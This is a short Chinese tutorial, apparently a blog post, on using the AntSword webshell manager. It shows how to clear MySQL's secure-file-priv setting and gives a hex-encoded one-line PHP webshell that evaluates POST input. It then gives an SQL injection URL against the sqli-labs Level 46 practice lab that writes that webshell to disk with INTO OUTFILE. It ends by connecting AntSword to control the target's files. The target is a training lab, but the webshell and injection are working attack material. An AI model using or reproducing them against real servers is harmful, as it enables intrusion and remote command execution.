中国蚁剑使用方法

找到mysql配置文件

python 复制代码
secure-file-priv=

工作目录

python 复制代码
D:\tool\huli\gui_webshell\AntSword\AntSword\antSword-master

重点是tool目录后面 前面大家可能都不一样

添加数据

一句话木马

python 复制代码
3C3F706870206576616C28245F504F53545B22636D64225D293B3F3E
翻译过来
<?php eval($_POST["cmd"]);?>

示例天书第46关上传木马

python 复制代码
/?sort=1%20into%20outfile%20"D:\\phpstudy_pro\\WWW\\sql\\sqli-labs-master\\Less-46\\test1.php"%20lines%20terminated%20by%200x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e

选择你上传一句话木马的url地址 具体到 你上传的文件名

这个参数就是连接密码

完成操作后 可以操作对方的目录

相关推荐
Bruce_Liuxiaowei8 小时前
AI攻防时间差:当漏洞发现速度碾压修复速度— 聚焦技术核心
网络·人工智能·网络安全·ai·系统安全
carrot1122310 小时前
jsrpc+mitmproxy配置
网络安全·jsrpc
深邃-17 小时前
【Web安全】-BurpSutie实战讲解(2):BP代理模块,BP重放模块,BP爆破模块,BP爬虫功能,BP解码模块,BP对比模块
爬虫·计算机网络·安全·web安全·网络安全·burpsutie
X7x518 小时前
移动设备管理(MDM):企业数字化转型的安全基石
网络安全·网络攻击模型·安全威胁分析·安全架构·mdm
汉堡包00118 小时前
【网安干货】--调用外部链接如何防御风险
安全·网络安全
紫墨丹青2 天前
贝锐向日葵IP和域名
网络·tcp/ip·网络安全·远程工作
pencek2 天前
HakcMyVM-Chromatica
网络安全
兜有米啦2 天前
HCIP2
网络安全
HungryGoogle2 天前
【无标题】
python·网络安全
TechWayfarer2 天前
网络安全视角:利用IP定位API接口识别机房与基站流量(合规风控篇)
开发语言·网络·数据库·python·安全·网络安全